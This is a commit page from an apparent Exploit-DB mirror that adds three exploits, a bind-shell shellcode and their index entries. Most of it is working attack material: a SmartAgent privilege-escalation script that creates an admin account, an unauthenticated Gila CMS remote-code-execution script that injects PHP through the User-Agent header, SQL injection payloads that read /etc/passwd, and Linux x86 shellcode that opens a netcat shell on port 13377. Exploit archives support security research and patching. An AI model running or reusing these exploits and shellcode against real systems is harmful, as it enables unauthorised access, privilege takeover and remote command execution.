bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-01-13

Browse source 
4 changes to exploits/shellcodes

Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated)
Cemetry Mapping and Information System 1.0 - Multiple SQL Injections
SmartAgent 3.1.0 - Privilege Escalation

Linux/x86 - bind shell on port 13377 Shellcode (65 bytes)
This commit is contained in:
Offensive Security 2021-01-13 05:01:55 +00:00
parent 66f2f8c3b5
commit 91f4f8025d
6 changed files with 174 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

32
exploits/multiple/webapps/49415.py Executable file
View file

@ -0,0 +1,32 @@
# Exploit Title: SmartAgent 3.1.0 - Privilege Escalation
# Date: 01-11-2021
# Exploit Author: Orion Hridoy
# Vendor Homepage: https://www.smartagent.io/
# Version: Build 3.1.0
# Tested on: Windows 10/Kali Linux
A Low grade user like ViewOnly can create an account with SuperUser
permission.
Steps To Reproduce:
1. Create a user with ViewOnly
2. Visit https://demo.localhost.com/#/CampaignManager/users
3. Now you will be able to create an account with SuperUser.
#Python Exploit [Replace With Your Authorization Code]
import requests
session = requests.Session()
rawBody = "{\"username\":\"orion@hridoy.com
\",\"password\":\"Orionhridoy69\",\"appName\":\"AppEngage\",\"role\":\"Admin\",\"android\":\"1\",\"ios\":\"0\",\"kai\":\"0\"}"
headers = {"Authorization":"id=orion@gmail.com,engageToken=eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJvcmlvbkBnbWFpbC5jb20iLCJyb2xlcyI6WyJWaWV3T25seSJdLCJhcHBOYW1lIjoiQXBwRW5nYWdlIiwicGxhdGZvcm0iOiJBTkRST0lEIiwiaXNzIjoiRU5BR0FHRSIsImlhdCI6MTYxMDM3NDEyMCwiZXhwIjoxNjExMjM4MTIwfQ.SbnZaRe3-2GOFOm7QDzvIBQCKBAK_GV-wKsMoH4GGChyjUFe2Ij4LiVl5rXsWRfTqNnJXj9fFxYTzkD2-kXlAQ","Accept":"application/json,
text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64;
rv:52.0) Gecko/20100101
Firefox/52.0","Referer":"https://demo.localhost.com/","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip,
deflate","DNT":"1","Content-Type":"application/json"}
response = session.post("https://demo.localhost.com/api/createUser",
data=rawBody, headers=headers)
print("User Created With\nUser: orion@hridoy.com\nPass: Orionhridoy69")

20
exploits/php/webapps/49412.py Executable file
View file

@ -0,0 +1,20 @@
# Exploit Title: Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated)
# Date: 1.12.2021
# Exploit Author: Enesdex
# Vendor Homepage: https://gilacms.com/
# Software Link: https://github.com/GilaCMS/gila/releases/tag/2.0.0
# Version: x < 2.0.0
# Tested on: Windows 10
import requests
import time
target_url = "http://192.168.1.101:80/Gila/"
cmd = "calc.exe"
url = target_url+"?c=admin"
cookies = {"GSESSIONID": "../../index.php"}
headers = {"User-Agent": "<?php shell_exec('"+cmd+"'); include 'src\\core\\bootstrap.php'; ?>"}
requests.get(url, headers=headers, cookies=cookies)
time.sleep(5)
requests.get(target_url+"/index.php")

83
exploits/php/webapps/49413.txt Normal file
View file

@ -0,0 +1,83 @@
# Exploit Title: Cemetry Mapping and Information System 1.0 - Multiple SQL Injections
# Exploit Author: Mesut Cetin
# Date: 2021-01-12
# Vendor Homepage: https://www.sourcecodester.com/php/12779/cemetery-mapping-and-information-system-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12779&title=Cemetery+Mapping+and+Information+System+Using+PHP%2FMySQLi+with+Source+Code
# Affected Version: 1.0
# Vulnerable parameter: "Search" bar (POST method)
# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0
SQL Injection is a type of an injection attack that makes it possible to execute malicious SQL statements. Due to unsanitized user input, the attacker can retrieve the entire SQL database in this case.
Explanation:
The function "person.php" takes user input through the search bar at line 45:
"$_POST['search']"
and uses it without any sanitization for the following SQL statement (line 46-49):
$sql = "SELECT * FROM tblpeople WHERE FNAME LIKE '%".$search."%'";
$mydb->setQuery($sql);
$cur = $mydb->executeQuery();
$numrows = $mydb->num_rows($cur);//get the number of count
A single quote (') at the search bar under http://localhost/CemeteryMapping/index.php?q=person will result in SQL synthax errors.
Proof of Concept:
Since the php code lacks of sanitization of the user input, multiple SQL injection queries can be found.
1. Boolean-based SQL injection
POST request the page /CemeteryMapping/index.php?q=person and use as payload: ' or 1=1 --
search=' or 1=1 --
2. Union-based SQL injection
To retrieve sensitive files like /etc/passwd, use the following payload at the search bar (POST request http://localhost/CemeteryMapping/index.php?q=person):
search=' UNION SELECT NULL,load_file('/etc/passwd'),NULL,NULL,NULL,NULL,NULL-- -
If you want to enumerate the target system further, replace "load_file('/etc/passwd')" with one of the following MySQL commands:
@@hostname : Current Hostname
@@tmpdir : Temp Directory
@@datadir : Data Directory
@@version : Version of DB
@@basedir : Base Directory
user() : Current User
database() : Current Database
version() : Version
schema() : current Database
UUID() : System UUID key
current_user() : Current User
current_user : Current User
system_user() : Current System user
session_user() : Session user
@@GLOBAL.have_symlink : Check if Symlink is enabled or disabled
@@GLOBAL.have_ssl : Check if it have SSL or not
3. Time-based SQL injection
For time-based SQL injection, use the payload: ' AND (SELECT 2634 FROM (SELECT(SLEEP(5)))muaN)-- -
Mitigation:
By using prepared statements and parameterized queries, the SQL injection can be prevented.

3
files_exploits.csv
View file

@ -43616,3 +43616,6 @@ id,file,description,date,author,type,platform,port
49406,exploits/php/webapps/49406.txt,"WordPress Plugin Custom Global Variables 1.0.5 - 'name' Stored Cross-Site Scripting (XSS)",2021-01-11,"Swapnil Subhash Bodekar",webapps,php,
49407,exploits/php/webapps/49407.txt,"OpenCart 3.0.36 - ATO via Cross Site Request Forgery",2021-01-11,"Mahendra Purbia",webapps,php,
49410,exploits/php/webapps/49410.txt,"Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection",2021-01-11,"Jaimin Gondaliya",webapps,php,
49412,exploits/php/webapps/49412.py,"Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated)",2021-01-12,Enesdex,webapps,php,
49413,exploits/php/webapps/49413.txt,"Cemetry Mapping and Information System 1.0 - Multiple SQL Injections",2021-01-12,"Mesut Cetin",webapps,php,
49415,exploits/multiple/webapps/49415.py,"SmartAgent 3.1.0 - Privilege Escalation",2021-01-12,"Orion Hridoy",webapps,multiple,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -1025,3 +1025,4 @@ id,file,description,date,author,type,platform
48592,shellcodes/linux_x86/48592.c,"Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes)",2020-06-17,"Xenofon Vassilakopoulos",shellcode,linux_x86
48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",2020-07-26,danf42,shellcode,linux_x86
48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download using mshta.exe Shellcode (100 bytes)",2020-07-26,"Siddharth Sharma",shellcode,windows_x86
49416,shellcodes/linux/49416.txt,"Linux/x86 - bind shell on port 13377 Shellcode (65 bytes)",2021-01-12,ac3,shellcode,linux

1 id file description date author type platform
1025 48592 shellcodes/linux_x86/48592.c Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes) 2020-06-17 Xenofon Vassilakopoulos shellcode linux_x86
1026 48703 shellcodes/linux_x86/48703.c Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes) 2020-07-26 danf42 shellcode linux_x86
1027 48718 shellcodes/windows_x86/48718.c Windows/x86 - Download using mshta.exe Shellcode (100 bytes) 2020-07-26 Siddharth Sharma shellcode windows_x86
1028 49416 shellcodes/linux/49416.txt Linux/x86 - bind shell on port 13377 Shellcode (65 bytes) 2021-01-12 ac3 shellcode linux

35
shellcodes/linux/49416.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: Linux/x86 - bind shell on port 13377 Shellcode (65 bytes)
# Date: Jan 12, 2021
# Exploit Author: ac3
# Version: Linux x86
# Tested on: Linux x86
## linux x86 nc -lvve/bin/sh -p13377 shellcode
## This shellcode will listen on port 13377 using netcat and give /bin/sh to connecting attacker
# 31 c0 xor %eax,%eax
# 31 d2 xor %edx,%edx
# 50 push eax
# 68 33 33 37 37 push $0x37373333
# 68 2d 76 70 31 push $0x3170762d
# 89 e2 mov %esp,%edx
# 50 push %eax
# 68 6e 2f 73 68 push $0x68732f6e
# 68 65 2f 62 69 push $0x69622f65
# 68 2d 6c 76 76 push $0x76766c2d
# 89 e1 mov %esp,%ecx
# 50 push %eax
# 68 2f 2f 6e 63 push $0x636e2f2f
# 68 2f 2f 2f 2f push $0x2f2f2f2f
# 68 2f 62 69 6e push $0x6e69622f
# 89 e3 mov %esp,%ebx
# 50 push %eax
# 52 push %edx
# 51 push %ecx
# 53 push %ebx
# 31 d2 xor %edx,%edx
# 89 e1 mov %esp,%ecx
# b0 0b mov $0xb,%al
# cd 80 int $0x80
\x31\xc0\x31\xd2\x50\x68\x33\x33\x37\x37\x68\x2d\x76\x70\x31\x89\xe2\x50\x68\x6e\x2f\x73\x68\x68\x65\x2f\x62\x69\x68\x2d\x6c\x76\x76\x89\xe1\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x2f\x2f\x2f\x68\x2f\x62\x69\x6e\x89\xe3\x50\x52\x51\x53\x31\xd2\x89\xe1\xb0\x0b\xcd\x80